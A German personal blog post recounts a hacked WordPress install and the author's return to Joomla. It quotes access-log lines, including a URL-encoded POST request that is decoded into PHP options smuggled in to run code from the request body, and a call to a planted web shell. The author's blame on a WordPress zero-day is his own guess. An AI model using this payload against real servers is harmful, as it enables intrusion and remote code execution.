Zwei Wochen mit Wordpress

Kategorie: Blog Veröffentlicht: Montag, 12. August 2013 Drucken E-Mail

Eigentlich wollte ich nach dem Umzug der Domain zu Hetzner die alte Joomla installation durch WordPress ersetzen. Das hatte ich auch genau zwei Wochen im Einsatz. Bis ich dann irgendwelche komischen codierten PHP Dateien in allen Vhosts gefunden habe. Sieht so aus als wäre ich relativ schnell Opfer einer Zero-Day Lücke im aktuellen WordPress geworden.

Ein Blick in die Logfiles zeigt auch recht schnell, wie der Angriff von statten ging

188.190.98.18 - - [06/Aug/2013:09:06:00 +0200] "POST /?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 945 "-" "Python-urllib/2.6"

 Schaut man sich das Ganze mal mit urldecode an kommt dabei folgendes zutage

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n

Irgendwie scheint es dem Angreifer möglich durch einen POST request die PHP Konfiguration zur Laufzeit zu ändern und eine Datei hoch zu laden. Dieser Request wurde drei mal ausgeführt und somit auch drei Dateien auf meinen Webserver geschaufelt. Dann war erstmal Ruhe, ich geh mal davon aus das dies automatisiert durch einen Bot geschiet.

Ein paar Tage später kam das Scriptkiddie dann selber vorbei

31.133.54.196 - - [10/Aug/2013:10:21:06 +0200] "POST /w64333222n.php?truecss=1&t2122n=1&cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.1" 200 1438 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"

 Hier wird eine der Dateien per POST aufgerufen und über ein Formular weitere Dateien auf den Server geschaufelt. Darunter waren Scripte zum bearbeiten aller im Verzeichniss liegender Dateien, ein paar c Scripte, eine Shell und noch ein wenig anderer Kleinkram. Die PHP Scripte waren alle base64 encoded und enthielten nen Menge Funktionen um Blödsinn anzustellen.

Ich will jetzt auch garnicht weiter ins Detail gehen, als erste Amtshandlung ist WordPress ohne groß darüber nachzudenken vom Server gefolgen und ich hab wieder Joomla installiert. Der Schaden war nicht groß, da ich es rechtzeitig gemerkt habe und auf der WordPress Seite hatte ich bis jetzt kaum Inhalte eingepflegt. Die Vorbehalte die ich bis jetzt immer gegen Wordpress hatte wurde relativ schnell bestätigt und ich werde in Zukunft wieder die Finger davon lassen.

 

über mich
Michael Pfister
Autor: Michael Pfister
Seit mehr als 12 Jahren Webentwickler mit Schwerpunkt PHP, Javascript und CSS Zur Zeit arbeite ich bei T-Systems Schweiz als System Engineer mit dem Schwerpunkt Automatisierung. Und nebenbei fahr ich noch Fahrrad;-)

Zugriffe: 5456